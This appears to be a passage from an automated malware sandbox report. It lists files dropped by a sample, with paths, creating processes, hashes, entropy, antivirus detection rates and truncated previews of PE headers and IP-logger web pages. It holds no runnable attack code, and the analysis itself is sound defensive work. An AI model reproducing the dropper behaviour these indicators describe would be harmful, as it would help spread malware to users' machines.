                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\BDWPWht51PAB6sI39ee6Tgbk.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\FH9ZiJrSMFU3hHrXc5ibJbFE.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\FXJXJcvxtZRFvWakkN6k83di.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.x...............................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):49120
                                                                                                                                                                                                                                                            Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ztt:T
                                                                                                                                                                                                                                                            MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                                                                            SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                                                                            SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                                                                            SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                                                                                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                                                                                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                                                                                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                                                                                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\PsfJgdgdADnk5mVYPGyLWZVX.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7446
                                                                                                                                                                                                                                                            Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                                            MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                                            SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                                            SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                                            SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):323584
                                                                                                                                                                                                                                                            Entropy (8bit):6.109731815911019
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:HvEczeu14403Cgega/YYn13VguOBft5QRt15VbvVXbzMbtdu:PEcv144/getAfQZfbNrgzu
                                                                                                                                                                                                                                                            MD5:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            SHA1:0D89E46868396DF24B3113D778A9ACDD81ECBE2A
                                                                                                                                                                                                                                                            SHA-256:DB184DF3910B9B55E6F47E316D8F4CE4D9213A2BCA188A53201A57301352AA52
                                                                                                                                                                                                                                                            SHA-512:5D3CB21DCE95B6A9958205F794DB293EF75BB3ED1DCA9ED1ABC2A81D2D4D6CD9891A028FC7F325CF3D7DE91F75CF3D912FEE491947976A76C07E8B7A3EF9C977
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.fL..5L..5L..5...5N..5k..5X..5k..5&..5k..5`..5...5C..5L..5...5k..5J..5k..5M..5RichL..5................PE..L...?..e.............................3............@.................................Ua......................................d...........X...............................................................@............................................text...\........................... ..`.rdata..............................@..@.data....-....... ..................@....rsrc...X...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283768
                                                                                                                                                                                                                                                            Entropy (8bit):7.982051005050529
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:+2m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3H4:+LIvF/H3d7z7Y3UUtoH4
                                                                                                                                                                                                                                                            MD5:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            SHA1:6CE570E927D57E05F9FA25A37EAF0FB62CEFAF8A
                                                                                                                                                                                                                                                            SHA-256:AC365E2F49564BA5ABA374317FFB9AC29A20B338DB67DEC02D459C9AB85DE637
                                                                                                                                                                                                                                                            SHA-512:50DB5C233C258C0B99F868C4279CDBAB1FB252B5F87EFB207E865BA14F49ECC415AF329B379982072427120BF72250E434F1A9AD938342F3DFD40C31E84401D4
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.x...............................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\SNzmN8HQUSehVCgProaZjQEN.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.58913170465177
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QQvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:5bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:C38FD6DC0269B3EFE182C55089398423
                                                                                                                                                                                                                                                            SHA1:3A60BFBC898C6225B9FD75077847C0836BD677AF
                                                                                                                                                                                                                                                            SHA-256:46F83A9CC705078187ED5478468A3919DEE2A9D6E9CF72351919975AA293F293
                                                                                                                                                                                                                                                            SHA-512:F32121ECCB90A21ED0DF100546D755D9D73BB1FA9DA79735C33406FB69EB57DC76C49CFF485306E581E1A54F58835AC4E43520FD52F6B57F56845EA96C5E92F1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="JO3nJ0zkvg8a79VMAihrGwZIViySMeJDj9Dfnlke">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1828864
                                                                                                                                                                                                                                                            Entropy (8bit):7.40381475947401
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:YUnaQiKJ8N+AadA6mICFhNGffVCPi9NUko6jE:ZwKa+u6mICFSwPKDK
                                                                                                                                                                                                                                                            MD5:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                                                                                                                                                            SHA1:28B40C88B8EA50B0782E2BCBB4CC0F411035F3D5
                                                                                                                                                                                                                                                            SHA-256:2A40E5DCCC7526C4982334941C90F95374460E2A816E84E724E98C4D52AE8C54
                                                                                                                                                                                                                                                            SHA-512:8F88901F3EBD425818DB09F268DF19CCF8A755603F04E9481BCF02B112A84393F8A900EAD77F8F971BFA33FD9FA5636B7494AAEE864A0FB04E3273911A4216DC
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^.................P........7.@YN...7..`N...@...........................S..................@....................<.......R.@....`N......................................................[N...............................<.....................UPX0......7.............................UPX1.....P....7..L..................@....rsrc........`N......P..............@..............................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huljxsgr.gyj.ps1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
